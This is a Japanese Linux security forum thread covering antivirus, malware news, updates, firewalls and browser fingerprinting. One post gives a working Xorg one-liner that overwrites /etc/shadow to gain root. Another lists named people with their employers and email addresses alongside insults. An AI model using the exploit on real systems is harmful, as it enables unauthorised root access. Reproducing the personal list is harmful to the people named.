Linuxセキュリティ総合スレ [無断転載禁止]©2ch.net
0067login:Penguin
2017/07/04(火) 01:23:11.94ID:RdyHvcf/くだらねえ質問はここに書き込め!Part 228
http://hayabusa6.2ch.net/test/read.cgi/linux/1494314571/
で聞いたほうが良いと思う
006866
2017/07/05(水) 00:22:13.88ID:uEgHtGC3ありがとう。
次回からそうするわ。
ちなみに、今回のは下記参考に自己解決したっぽい。
-md md5付けたら、現行1.1.0でもファイル開けました。
https://github.com/fastlane/fastlane/issues/9542
https://unix.stackexchange.com/questions/344150/why-can-one-box-decrypt-a-file-with-openssl-but-another-one-cant
0069login:Penguin
2017/09/07(木) 19:37:24.22ID:NhVQ+S22全くセキュリティーパッチを充てていないrhel6.1で、poodle対策をしなきゃいけないんだが、
設定変更だけで対処する場合は、ssl.confのcipherのところに -sslv3入れるだけで良い?
0070login:Penguin
2017/10/16(月) 19:17:31.78ID:AvEU8VfP_,,..,,,,_
/ ,' 3/⌒ヽ-、_
/l. /____/
 ̄ ̄ ̄ ̄ ̄ ̄ ̄
0071login:Penguin
2017/11/03(金) 21:09:20.77ID:UMEHXcXhセキュリティの基本は尖らないこと、目立たないこと。隠すこと。 バカ。
新名主 隆志 TIS shimmyozu.takashi@technopro.com
色田 眞吾 日立製作所 Shikita.Shingo@technopro.com
八木 一暢 TIS yagi.kazunobu@technopro.com
水野 潤 ハマゴムエイコム Mizuno.Jun@technopro.com
佐々木 優也 (首都圏第1支店案件) sasaki.yuya@technopro.com
佐々木 健太 日立製作所 sasaki.kenta@technopro.com
中野 洋行 NSSLCサービス Nakano.Hiroyuki@technopro.com
永井 真祐子 富士ソフト nagai.mayuko@technopro.com
品川区高輪3-25-33
都内のトイレに花子さんだ
日立の末端は、ただの派遣会社だからな。メーカーはどこも一緒か。。
0072login:Penguin
2017/12/29(金) 13:14:18.48ID:S/CsVkMC参考までに、
⇒ 『宮本のゴウリエセレレ』 というブログで見ることができるらしいです。
グーグル検索⇒『宮本のゴウリエセレレ』
HRT6GIPYTB
0073login:Penguin
2018/04/11(水) 07:03:34.17ID:9VtMkuZE_,,..,,,,_
/ ,' 3/⌒ヽ-、_
/l. /____/
 ̄ ̄ ̄ ̄ ̄ ̄ ̄
0074login:Penguin
2018/05/22(火) 11:10:27.97ID:Czl6p0FW関心がある人だけ見てください。
グーグルで検索するといいかも『ネットで稼ぐ方法 モニアレフヌノ』
BTBIK
0075login:Penguin
2018/05/26(土) 09:20:44.99ID:c6Ml0Dodhttp://hayabusa9.2ch.net/test/read.cgi/news/1527149278/l50
0076login:Penguin
2018/05/26(土) 12:43:59.58ID:H0+abEbN0077login:Penguin
2018/05/27(日) 16:31:34.31ID:QzfBv+yQ0078login:Penguin
2018/07/08(日) 20:50:42.96ID:QTYf4jMn_,,..,,,,_
/ ,' 3/⌒ヽ-、_
/l. /____/
 ̄ ̄ ̄ ̄ ̄ ̄ ̄
0079login:Penguin
2018/10/31(水) 11:46:41.86ID:XLo7vX23https://www.exploit-db.com/exploits/45697/
cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su
xorgはフォントパスのリストをそのままログに書き込むことを利用してる
(shadowが上書きされるので試すならshadowのバックアップを取ってからどうぞ)
0080login:Penguin
2019/03/10(日) 12:39:41.95ID:BHkfBLF0| 8 )
∧,,,∧∩-''"
_ ..(´・ω・`)彡 おぱんつ おぱんつ ! !
〃(\ ∞ ,⊂彡
`ヽ)_ノ| |
し⌒J
0081login:Penguin
2019/05/24(金) 01:31:09.68ID:WQ5DwMzT( ´ ・ω・) 呼んだ ?
0082login:Penguin
2019/05/31(金) 12:30:43.06ID:bdQbsGXYhttps://news.mynavi.jp/article/20190531-833791/
Intezerは5月19日(米国時間)、Linuxシステムを標的とした新しいマルウェア「HiddenWasp」を
発見したと「Intezer - HiddenWasp Malware Stings Targeted Linux Systems」で伝えた。
このマルウェアは現在も活動を継続しており、主要なアンチウィルスシステムで検出することが
できないと指摘されている。発見されたHiddenWaspの主な特徴は以下の通り。
・Linuxマルウェアの多くは仮想通貨マイニングやDDoS攻撃に焦点を当てているが、HiddenWasp
は異なっている。HiddenWaspはトロイの木馬として設計されており、標的のシステムを純粋に
リモートコントロールするために開発されている
・HiddenWaspに感染しているユーザーはすでに標的型攻撃のターゲットになっている可能性が
高い
・HiddenWaspはMiraiやAzazelルートキットといった入手可能なオープンソース・マルウェア
から大量のソースコードが流用されている
・HiddenWaspは中国のマルウェアファミリーに強い類似性があるものの、帰属に関しては可能
性が低いと見られる
Intezerは、Linuxを標的としたマルウェアは時間の経過とともにますます複雑になり続けている
と指摘。現在、一般的な脅威でも検出率があまり高くないが、より高度な脅威はさらに検出率が
低いという。今後、Linuxを標的としたマルウェアはさらに検出が難しくなるおそれがあり、
注意が必要。
0083login:Penguin
2019/06/01(土) 00:37:42.11ID:/N3jDoCjこれはひどい
俺が唯一Linuxに移行できない理由がアンチウイルスソフトだからな
Windowsのノートンみたいに完璧なのがあれば、ノートン一つで完全に防げるけど、
Linuxにはこれがないからな
SophosAntiVirusがあるが、なぜか定義ファイルの更新が20日異常ないぞ(気のせい?)
RKHunter、Tripwire、Lynis、Firewallとかだけとかありえんだろ?
0084login:Penguin
2019/06/01(土) 03:51:20.70ID:BeN0lDY70085login:Penguin
2019/06/01(土) 08:23:33.96ID:0WGBvA8Dノートンは3日後だったことがあった
0086login:Penguin
2019/06/01(土) 23:05:01.15ID:aQmSSgBv毎日更新してるんじゃないかな
ノートンやトレンドマイクロが対応してない最新のウィルスを先んじて検出したことがあったし、古い日付になってる定義ファイルはベースとなるやつの日付だと思ってる。
008783
2019/06/02(日) 01:29:08.34ID:Zexh2AIq次のバージョンをアップデート中です - SAV: 9.15.1、エンジン: 3.74.2、データ: 5.63
Updating Sophos Anti-Virus....
Updating SAVScan on-demand scanner
Updating Virus Engine and Data
Updating Manifest
Update completed.
次のバージョンにアップデートしました - SAV: 9.15.1、エンジン: 3.74.2、データ: 5.63
sdds:SOPHOS からの Sophos Anti-Virus のアップデートに成功しました
$ sudo /opt/sophos-av/bin/savdstatus --version
Copyright 1989-2018 Sophos Limited. All rights reserved.
Sophos Anti-Virus = 9.15.1
ビルドのリビジョン = 2793374
脅威検出エンジン = 3.74.2
脅威データ = 5.63
検出脅威数 = 35620036
脅威データリリース日 = 2019年05月07日 00時00分00秒
前回アップデートを確認した日時 = 2019年06月02日 01時01分28秒
と脅威データリリース日がずっと5/7のままなんだよね
これでも最悪1日毎には更新してるのかね?
ノートンだと1時間に1回は更新してるっぽいけど
更新しててくれてると助かるのだが
008883
2019/06/02(日) 01:30:11.25ID:Zexh2AIq008983
2019/06/03(月) 00:52:09.01ID:LINEVdyyここ見たらやはり1日1回ぐらいは更新されてそう
実際俺のSophosは普通に6/2更新されてた
どうも"脅威データリリース日 = 2019年05月07日 00時00分00秒"と
ウイルス定義ファイル更新日は違うらしい
ウイルス定義ファイル更新日もちゃんと書けよ>Sophos
Sophos Anti-Virus: ウイルス定義ファイル (IDE ファイル) が最新の状態にアップデートされているかどうかを確認する方法
https://community.sophos.com/kb/ja-jp/121984
0090login:Penguin
2019/06/03(月) 02:02:29.21ID:jJq3PPoG0091login:Penguin
2019/06/03(月) 02:06:37.36ID:jJq3PPoG世に知れ渡っていないウイルスが仕込まれていた場合に
ウイルス検知ソフトがそれを正しく検出してくれることはまれ。
何ヶ月か何年かあとになって改めてチェックしてみると検出される場合がある。
でもダウンロードあと、そこまで待ってインストールする人はいない。
0092login:Penguin
2019/06/03(月) 08:05:48.00ID:eMJGOUo4これの元記事によるとvirustotalで引っかからない
https://www.intezer.com/wp-content/uploads/2019/05/pasted-image-0-1.png
つまりノートンだろうが何だろうが脅威としないで放置されるということ
感染経路はわからんが野良危険ということだろう
0093login:Penguin
2019/06/03(月) 22:51:46.35ID:sgwkICklこれは具体的にどう注意したらいいんだ?
009483
2019/06/03(月) 22:56:08.11ID:LINEVdyy↓となってるから(途中に更新あったかは知らんが多分ないだろ)
昨日
<published>2019-06-02T13:03:35</published>
今日
<published>2019-06-03T13:07:34</published>
0095login:Penguin
2019/06/04(火) 11:45:07.22ID:JnEdCGFR009683
2019/06/04(火) 23:57:45.16ID:8eAlB9kG全部、適当に入れればいいよ
メアドは@と.orgとか.comは入れないとだめだけど、これも適当で大丈夫
0097login:Penguin
2019/06/05(水) 09:35:56.10ID:2u//H+UO0098login:Penguin
2019/06/05(水) 21:45:09.38ID:1PL8mpQbあったとしても、100%適当で通るよ
役職・法人名も適当でおk
国、県、郵便番号は日本、東京、1000000でおk
ちなみにLinux版はこれね
https://secure2.sophos.com/ja-jp/products/free-tools/sophos-antivirus-for-linux/download.aspx
https://www.sophos.com/ja-jp/products/free-tools/sophos-antivirus-for-linux.aspx
ここからいって普通に全部適当に入力しおわったら、自動でダウンロード始まるよ
0099login:Penguin
2019/06/06(木) 13:34:15.13ID:Vt0/9sNy都道府県がなぜか受け付けてくれない
0100login:Penguin
2019/06/06(木) 20:22:08.58ID:yFuR+pcY先に国名で「日本」選んだら都道府県欄に▲▼が出て、普通にマウスクリックで「Tokyo」が選べるようになるでしょ
国名: 日本
都道府県:Tokyo
郵便番号:100-0000
で大丈夫だよ
0101login:Penguin
2019/06/07(金) 09:06:17.12ID:boyNvVP0▲▼が出てこない
0102login:Penguin
2019/06/07(金) 20:09:33.53ID:/Sk2vmHZオフになってるんじゃない?
0103login:Penguin
2019/06/07(金) 21:33:16.30ID:yVEJ6IS3これはちと使えないわ
0104login:Penguin
2019/06/07(金) 23:40:08.48ID:/Sk2vmHZ0105login:Penguin
2019/06/08(土) 02:35:25.81ID:/huWGbTD1年間9500円アップグレード4700円って高いな
ライセンスだけでメンテナンス不要版もあるの?
値段はここの43ページ
https://www.symantec.com/content/ja/jp/micro_partner/Sales_guide_SEPSPS_14_2013Feb.pdf
0106login:Penguin
2019/06/10(月) 15:44:13.86ID:9N/TTeW/ESETはWIn版にはあるみたいだけど、Linux版にはないみたいだし。
UEFIの脆弱性(Intel ME)を考えたらLinuxパソコンの最大の弱点はUEFIだと思うのですが。
オープンソースで誰か作ってくれないかな・・・
0107login:Penguin
2019/06/18(火) 02:35:54.34ID:AVJfVicPCatalin Cimpanu (ZDNet.com) 翻訳校正: 編集部 2019年06月17日 10時47分
https://japan.zdnet.com/article/35138550/
Microsoftは米国時間6月14日、「Exim」経由で拡散するLinuxのワームについて、一部の
Azureも影響を受けるとしてAzure顧客向けに警告を出した。
このワームは米ZDNetが6月13日に最初に報じ、その後詳細情報がレポートされたもので、
CVE-2019-10149の脆弱性を利用してEximメールサーバーに感染する。この脆弱性は、悪用
されると攻撃者が遠隔からコマンドを実行してパッチを当てていないシステムを乗っ取る
ことができるというものだ。
ワームはこの脆弱性を利用してサーバーを乗っ取り、他のサーバーをスキャンして感染を
広げようとする。そして乗っ取ったホストに暗号通貨マイニングを投下する。
Eximはメール転送エージェント(MTA)で、Linuxベースの電子メールサーバー上で動かし
送信者から受信者に電子メールのリレーを行う。このワームはEximが動くサーバーを狙う。
Microsoftが14日に出した警告によると、Azureインフラもこのワームの影響を受けると
いう。幸い、Azureインフラは「このワームの拡散を制限するのを助けるための制御」を
敷いているとMicrosoftは述べている。(後略)
0108login:Penguin
2019/06/18(火) 17:26:10.39ID:6P/bvjY8PANIC) (CVE-2019-11477, CVE-2019-11478, CVE-2019-11479, CVE-2019-5599)
2019年6月18日 05:11 Kazuki Omo
https://security.sios.com/vulnerability/misc-security-vulnerability-20190618.html
こんにちは。SIOS OSSエバンジェリスト/セキュリティ担当の面 和毅です。
06/17/2019にNetflixからFreeBSDとLinux Kernelに対して、幾つかのTCPの脆弱性に関する
アドバイザリーが出されました(CVE-2019-11477, CVE-2019-11478, CVE-2019-11479,
CVE-2019-5599)。アドバイザリーは最小セグメントサイズ(MSS)とTCP SACKに関するものに
なります。最も深刻な「SACK Panic」と呼ばれるものは、最近のLinux Kernelにリモート
からKernel Panicを引き起こすことができます。Netflixの方でPatchも提供されています。
今後も情報が出てくると思われますので、こちらで取り上げます。
逐次情報は更新していく予定です。
0109login:Penguin
2019/06/22(土) 09:34:44.67ID:BWxAJ8Sjまた、
◆snapアプリのアップデートはaptコマンドでは不可能である。
初心者向けに、Ubuntuを例にセキュリティーアップデートの手順を示す。(Kubuntu、Xubuntu、LubuntuなどのUbuntuフレーバーたちも同じ)
(1)ターミナルを開き、下記のコマンドを打ち、最新情報を取得する。
$ sudo apt update
(2)最新の情報が取得され、システムは最新ですとの表示が出たら(4)に飛ぶ。もし、アップデートの必要のあるパッケージがあることが示されたら、次のコマンドを打ち、パッケージをダウンロードしてインストールする。
$ sudo apt -y upgrade
ちなみに「-y」オプションは付けても付けなくても良いが、付けなかった場合には、インストール直後に本当にインストールして良いを[Y/N]と表示して確認してくる。この場合はYesを意味するYを押すことでインストールが始まる。
「-y」オプションを付けるとこの手順が飛ばされてダウンロードが完了次第、すぐにインストールが開始される。
(3)次の2つのコマンドは、それぞれ上記のコマンド実行の結果として、不要となった古いパッケージ、不要となったキャッシュを削除する。掃除であるから実行はたまにで良いが、ストレージ容量が少ない環境の人は頻繁にやるべきだろう。
$ sudo apt autoremove
$ sudo apt autoclean
(4)次にsnapアプリの更新を行う。
$ sudo snap refresh
snapアプリをインストールした覚えが無くとも、システムがsnapを使っているため必ず実行すること。例えばGNOMEシェルはsnapであり、Ubuntu18.04.x LTSはすでに更新の必要が出ているので、未実行であれば直ぐに実行し最新版にしよう。
GUIからはすべてのアップデートや掃除はできない。取り分けsnapは(4)の手動アップデートでなければ更新できない。
出来るだけ毎日、しっかりアップデートを行い、セキュアなLinuxライフを送ろう。
0110login:Penguin
2019/07/03(水) 23:55:13.69ID:OptOlEBILinuxなんて使わない。
以上。
0111login:Penguin
2019/09/29(日) 21:20:57.29ID:Nip3Jzi1(,,・_・).。oO( 毛深くなりたい・・・ )
ヾ(,_uuノ
0112login:Penguin
2019/10/13(日) 01:09:29.50ID:ueikBXbuhttps://jp.techcrunch.com/2019/05/08/2019-05-07-android-developers-can-now-force-app-updates/
0113login:Penguin
2019/10/25(金) 00:20:33.72ID:j4GkuklAそれ違う
負けないためには、だね
コモドでいいよな?
0114login:Penguin
2019/12/12(木) 00:50:01.16ID:jaG34Ck9https://leia.5ch.net/test/read.cgi/poverty/1576065630/
供給電圧を変化させてプロセッサを攻撃する新ハッキング手法「プランダーボルト」が発見される | TechCrunch Japan
https://jp.techcrunch.com/2019/12/11/2019-12-10-plundervolt-attack-breaches-chip-security-with-a-shock-to-the-system/
Plundervolt
https://plundervolt.com/
17 名前:番組の途中ですがアフィサイトへの転載は禁止です (ワッチョイWW 2bc5-3D6L)[sage] 投稿日:2019/12/11(水) 21:19:15.97 ID:x8hKACYL0
電圧変えて何すんのよ
システムダウン?
19 名前:番組の途中ですがアフィサイトへの転載は禁止です (ブーイモ MM39-B8XO)[sage] 投稿日:2019/12/11(水) 21:24:40.54 ID:/b3E3oTYM
>>17
プロセッサ内で隠蔽されている暗号鍵を取得する。Blurayの暗号鍵もインテルの脆弱性で割れた
26 名前:番組の途中ですがアフィサイトへの転載は禁止です (アウアウエー Sa13-MFI9)[sage] 投稿日:2019/12/11(水) 22:31:10.46 ID:g2xDg2x0a
>>17
エラーが起きたと思って秘匿領域のデータをダンプするんだってさ
0115login:Penguin
2019/12/12(木) 02:35:29.36ID:QpDguOY00116login:Penguin
2019/12/12(木) 19:43:32.89ID:jaG34Ck944 名前:番組の途中ですがアフィサイトへの転載は禁止です (ワッチョイ 5720-kui+)[] 投稿日:2019/12/12(木) 00:45:08.31 ID:gd2ZuGmF0 [1/2]
>1>19>26
なにこれ?
PC起動してないとCPUコントロール出来ないよね?
もしかして、ハードディスク暗号化してるPCを起動して、
暗号化解除する前にこの脆弱性使うと暗号化解除出来ちゃうとか?
>プロセッサ内で隠蔽されている暗号鍵
>秘匿領域
ここに何が格納されてるのか分からん
スーパーハッカー解説お願いします。
54 名前:番組の途中ですがアフィサイトへの転載は禁止です (ワッチョイ e228-kui+)[] 投稿日:2019/12/12(木) 03:25:28.44 ID:QS0Nrunu0
>>44
ハードディスク暗号化してるPCを起動して、暗号化解除して使用してる最中に、
この脆弱性を使うとCPUが隠してた暗号鍵を見ることができる
63 名前:番組の途中ですがアフィサイトへの転載は禁止です (アウアウエー Sa3a-0Ppm)[sage] 投稿日:2019/12/12(木) 05:18:32.13 ID:nA2cuX1+a
>>51
電圧いじれる(管理者)権限があってもSGXでやり取りされてる内容が見られないってのがウリの機能なので
UHD-BDの暗号化解除機構に使われてるんやで
55 名前:番組の途中ですがアフィサイトへの転載は禁止です (ワッチョイWW 5720-AQmm)[] 投稿日:2019/12/12(木) 03:55:03.70 ID:gd2ZuGmF0 [2/2]
>>54
それは結構やばいなあ
まあ、暗号化解除前では意味なさそうなのが救いだな
てか、cpuってハードディスクの暗号化解除後もcpu内に暗号を常時置いとくもんなの?
0117login:Penguin
2019/12/13(金) 19:09:08.80ID:ESmGY9a7コアダンプしそう
0118login:Penguin
2019/12/13(金) 19:14:21.26ID:ESmGY9a7流石にそこまで早くないか
0119login:Penguin
2019/12/16(月) 00:27:12.94ID:Oy6287lw0120login:Penguin
2019/12/16(月) 05:28:15.87ID:AxOoqKNy0121login:Penguin
2019/12/16(月) 06:38:47.87ID:AxOoqKNyWSLがどうでも良いわけじゃないだろうけど。
0122login:Penguin
2019/12/16(月) 20:16:03.60ID:F52Y2AF9MSの個人情報搾取に耐えかねてubuntuに逃げてきたのに
追いかけてくるってか...
0123login:Penguin
2019/12/17(火) 02:23:31.85ID:eJqKdH1LMSってそんな個人情報抜いてるの?
Skypeで抜いてるのにはびびったが。
あれはそこそこ信用してただけにびっくりした。
Skypeごときの情報抜かないだろうって思ってた。
MSってGoogle並みに個人情報抜いてるの?
Googleは怖くて使えんわ
あんなの住所氏名電話番号全部バレてるだろ
0124login:Penguin
2019/12/17(火) 03:54:51.93ID:+GuS9PLu0125login:Penguin
2019/12/17(火) 07:05:33.11ID:BN1fWjc10126login:Penguin
2019/12/17(火) 10:14:03.65ID:d36jgmOT作らせるよう誘導してくるな
Win8あたりからだった記憶があるけど、Win10が大型アップデート
するたびにどんどん露骨になってる印象
0127login:Penguin
2019/12/17(火) 10:37:04.71ID:h64x6iyX0128login:Penguin
2019/12/17(火) 21:04:10.21ID:IhVBQ6dnWindows10とかOffice365とか無思慮に まして仕事で使ってるヤツの気が知れんわ
0129login:Penguin
2019/12/17(火) 21:15:21.09ID:486GIvh4泥棒の手を引いて家ん中案内するようなもんだしね
0130login:Penguin
2019/12/18(水) 13:16:10.19ID:b8AkMopropensuseとfirefox?
0131login:Penguin
2019/12/18(水) 20:51:19.26ID:ng+ewP2Bubuntuにしてからは気軽に使えるsandboxが見当たらないんで仮想マシンにZorin LiteとFirefoxだけ入れてzipして
やはりweb見終わったら仮想マシン丸消しして その都度zipから戻してる
多少手間だが これならいくらcookieやcanvas喰おうが いつもキレーなブラウザでインターネッツできると思ったんだけどね
砂箱スレでdockerもススメられたけど dockerはなんか違うかな?と思ったわ
0132login:Penguin
2019/12/18(水) 23:21:12.25ID:Ghj3q23Vhttps://hayabusa9.5ch.net/test/read.cgi/news/1522897669/
0133login:Penguin
2019/12/19(木) 13:08:27.51ID:eQXTO88zfirefoxに余計な機能をブロックするuser.jsを育てたものを使ってる
デフォルトだとGの手が伸びてるし(safebrowsing)、テレメトリその他有効になってる…
GNUのicecat(firefox系)も良い感じ
>>131
firejail --private=<専用の一時ホームディレクトリ> とか?
canvasは個別に対応が必要だと思う
0134login:Penguin
2019/12/19(木) 15:29:49.65ID:hhS7ytBruser.jsは一時期手を出してみたけど「これワザとやってんじゃないの?」っていうくらい あの設定ワードって言うの?
about:configで左側に表示されるワードが 余りに頻繁に変更されるんで 根負けしてバンザイしたわ
>canvasは個別に対応が必要だと思う
とりまCanvasBlock入れてるけどOPTIONは内容が意味フで何言ってるかわかんないから手がつけられないでいるわ
やっぱ色々と設定いじった方がいいもんなの?
0135login:Penguin
2019/12/20(金) 02:13:31.46ID:3v00n4yQ0136login:Penguin
2019/12/20(金) 08:11:46.30ID:W5p7NQnV0137login:Penguin
2019/12/20(金) 20:28:03.18ID:BMpjrsOCBrowser Fingerprinting対策ツールの評価(pdf)
https://ipsj.ixsq.nii.ac.jp/ej/?action=repository_uri&;item_id=187815&file_id=1&file_no=1
Web Browser Fingerprint解説ページ
https://www.saitolab.org/fp_site/
0138login:Penguin
2019/12/21(土) 16:40:49.62ID:P2W6B/wx火狐は大丈夫なら 前2者は早速削除したいと思います。
0139login:Penguin
2019/12/21(土) 16:56:46.98ID:P2W6B/wxとありますので、設定していませんが、入れれば幾らかでも
安全になるのでしょうか
0140login:Penguin
2019/12/21(土) 20:37:04.76ID:8u1F/kP3Linux用ブラウザーを狙う奴なんていないから心配すんな。
あ、ブラウザー拡張機能は別な。拡張機能はOS問わずヤバいものがあるかもしれん。
>>139
例えばUbuntu新規インストしてupdate、dist-upgrade、rebootした後、
すぐにgufw入れてファイアーウォール有効にしても意味ないでしょ。
よく分かんないなら、とりあえずファイアーウォールは有効にしとけば?
0141login:Penguin
2019/12/21(土) 21:33:25.68ID:2yt7G6Glチョロメが個人情報泥棒ブラウザなのは周知の事実
何年か前からwin10にタメ張ってかなり大規模に盗みやってるらしいゾ
Win版のチョロはアンインストールしても 泥棒機能はOSの深いトコで生き続けるらしいから
もし無しにしたいのならOSの入れ直ししかねーんじゃね?
そんでせっかく金使って開発した泥棒機能をLinux版には入れていないなんて甘い見通しは無いと思うが?
ゴキグルから見たらwinユーザーもLinuxユーザーも同じ金だろうに
クロムもソースからゴキグルと通信する部分を削除していないのはアウトだと思っていーんじゃね?
0142login:Penguin
2019/12/22(日) 05:32:17.57ID:F7RmFDTNセキュリティは上がる、とは言える
最初はgufw,慣れればiptablesがおすすめ(FWというかネットワークの詳細なコントロールが出来る)
例えばFW無しだと、WANインターフェイスか0.0.0.0でリッスン中のプロセスがあれば外から繋がる
これが設定ミスや脆弱性から悪用に発展する可能性、どんなプログラムを走らせてるのかバレる、DOSの可能性
ルーターの内側に居ればベーシックなFWの内側に居るのに近いけど、アプリがUPnPで勝手にルーターでポートを開ける事も無理じゃない
LAN内の相手からは普通に繋がるし、必ずしもルーターの内側にいるのか?リッスン中のアプリに設定ミスや脆弱性は無いのか?
FWはそういう可能性をカット出来る(公開する意図のない宛先には)
不要なアタックサーフェイスは狭めるのがセキュリティの基本
0143login:Penguin
2019/12/22(日) 10:24:37.91ID:QiAxui6dほとんど判りませんが、兎に角拡張機能は避ける、fireWallは有効にしてみました、
ご教示有難う存じました。
0144login:Penguin
2019/12/23(月) 03:58:31.72ID:fOOPeHWrCanvasってなんだっけ?
CanvasってJavaScriptオフだと機能しないよね?
俺の勘違い?
0145login:Penguin
2019/12/23(月) 04:06:22.21ID:fOOPeHWrChromeは論外で他に選択しないからこの2つ以外入れてない
Torスレでもなんか話題になってたけど、
普通のブラウジングするのにTorbrowserのTor機能だけ切るのはどうなの?
TorBrowserもFirefox基盤だけど、
>>133の
>デフォルトだとGの手が伸びてるし(safebrowsing)、テレメトリその他有効になってる…
にはなってないよね?
なにせTorBrowserだし・・・
0146login:Penguin
2019/12/23(月) 04:54:54.78ID:fOOPeHWr>ubuntuにしてからは気軽に使えるsandboxが見当たらないんで
>仮想マシンにZorin LiteとFirefoxだけ入れてzipして
>やはりweb見終わったら仮想マシン丸消しして その都度zipから戻してる
なんでこんなめんどくさいことしてるの?
普通にFirefoxの全履歴削除すれば全部消えるんじゃないの?
UbuntuのJournalに履歴とか残るから?
0147login:Penguin
2019/12/23(月) 10:49:30.08ID:1IWvct7Nこれからはnftablesだよ
0148login:Penguin
2019/12/23(月) 12:05:01.09ID:x1WXtyaO0149login:Penguin
2019/12/23(月) 17:23:14.88ID:Y4WL5T530150login:Penguin
2019/12/24(火) 11:41:20.66ID:NeirOfqJここで言ってるのはfingerprinting技術
WEBにアクセスした時に、環境ごとにユニークな値を生成させて取得(同時にIPや他情報もなるべく取得)
その後IPを変えようがcookieやら消そうが同じようなユニークな値を取って紐付ければ特定に繋がる
ブラウザだとcanvas,audio,rectその他がフィンガープリントするのに使えるらしい
こんな追跡の仕方、技術の悪用に近いと思うけど…、色んな建前を使って取得&追跡されるのが常だからな
JSを切ればcanvasでは取れないような…?他もかなり良くなる
>>145
利便性とのバランスもあるけど、プライバシー重視なら俺もTor切ったTorBrowserは手っ取り早いと思う
プロ?集団がプライバシー重視でアンチフィンガープリンティングにも力を入れて設定&開発したんだ
公式でTor無しバージョンもリリースすれば良いのに
もちろんGやテレメトリその他色々無効になってる(about:configで確認出来る)
0151login:Penguin
2020/01/28(火) 22:15:11.09ID:zrSY3ZQshttps://leia.5ch.net/test/read.cgi/poverty/1580177900/
無料ウイルス対策ソフトのアバスト、ユーザーのウェブ閲覧データを販売か
Carrie Mihalcik (CNET News) 翻訳校正: 編集部2020年01月28日 11時07分
ウィルス対策ソフトウェアメーカーAvastが、Jumpshotという子会社を通して「機密性の高い」ウェブ閲覧データを販売していると報じられている。
https://japan.cnet.com/article/35148566/
0152login:Penguin
2020/01/28(火) 22:26:23.57ID:msT/XQYC0153login:Penguin
2020/01/28(火) 22:30:53.29ID:meBmn7jU用心したほうがいいんでしょう。そもそもなにゆえ無料なのか…
avast は Linux用もあるからね。
0154login:Penguin
2020/01/28(火) 22:39:50.10ID:msT/XQYC0155login:Penguin
2020/01/28(火) 22:49:55.26ID:meBmn7jU今は知らんけど、過去にはあった。
0156login:Penguin
2020/01/28(火) 22:52:43.99ID:meBmn7jU「ユーザーのプライバシーと、当社の主力セキュリティ製品で必要なデータ利用とのバランスをとる責任」があることを理解し、重くとらえていると述べている。
と、こんな記事があるのね。これはGoogleの利用許諾とよく似ているねえ。
やはり、ビッグデータを収集したいわけだ。そうじゃなきゃ、無料はおかしい。
0157login:Penguin
2020/01/28(火) 22:58:30.86ID:msT/XQYC今はないとしたらほぼ影響はないか
0158login:Penguin
2020/01/28(火) 23:02:40.66ID:meBmn7jU今ないのかどうかは知らないし、avast サイトをのぞきたくはないし。
0159login:Penguin
2020/01/28(火) 23:07:56.07ID:msT/XQYC検索するくらいは出来るでしょ
なさそうだけど
0160login:Penguin
2020/01/28(火) 23:09:01.59ID:YOaQ6DqC0161login:Penguin
2020/01/28(火) 23:10:35.37ID:meBmn7jU0162login:Penguin
2020/01/28(火) 23:14:54.44ID:msT/XQYCただ話膨らませるなら検索くらいしなよ
0163login:Penguin
2020/01/29(水) 00:38:40.10ID:FX+veRBJロシアと中華マジスゲエなあ
Linux関係ないけど、androidの中華作成のVirtual exposedってのも
ウイルスてんこ盛りらしいから気をつけてな
0164login:Penguin
2020/01/29(水) 08:40:01.61ID:QKw1rI8uつい先日レノボの Rayzen ノート買っちまったよ
0165login:Penguin
2020/01/29(水) 09:38:52.68ID:d7wE0hb8レノボは中共製で知られているが、個人データを密かに送信してるんじゃないかと
かなり前に騒がれたが、今ではその話題は見かけないようになった。
0166login:Penguin
2020/01/29(水) 09:48:03.97ID:d7wE0hb8じゃ、話しを膨らませてあげるよ。
皆さん、結構関心あったと思うけど。何人も、avast 使ってウイルス対策していたよ。
このソフトは、無料なのに使いやすかったからなあ。
レスを投稿する
ニュース
- 小泉龍司法相、同性婚を認めれば「幸せの量は間違いなく増える」 省内で議論していることを国会で説明 [蚤の市★]
- 「13年も働いたのに」待遇に不満 NTT顧客情報流出事件、元派遣社員に懲役3年求刑 判決は7月11日 [おっさん友の会★]
- 【東京】品川の住宅火災で母子4遺体、搬送された41代の父親に事情聞く方針…母親とは今月離婚 ★2 [モフモフちゃん★]
- 【芸能】星野源、所属事務所が警鐘 「名誉毀損の書き込みのリポストも違法」「誹謗中傷を繰り返す行為は『つきまとい行為』に該当」★2 [冬月記者★]
- 企業の「強欲インフレ」だった? 昨年度の物価上昇、賃上げに回らず [おっさん友の会★]
- 【野球】WBC決勝は次回もマイアミ 日本連覇へ、26年春開催 [征夷大将軍★]
- 【悲報】韓国・ソウルの出生率、0.55wwwwwwwWwwwww [407370637]
- 【悲報】皇居の電気代、1年間で7億円だった…。これは陛下もマイニングとかなさっているのか? [306119931]
- 【悲報】暇空茜の元に電車で何者かに盗撮された堀口くんらしき人物の動画がタレコミされる [776920507]
- カッペだが池袋に来た
- 丸の内OL「?!?!ここ丸の内だぞ!?会社の後輩だったら絶対イジメてるよ」10万いいね [388560661]
- 自民党「立憲も政治資金パーティーやってるじゃないか!」と国会で追及 [545512288]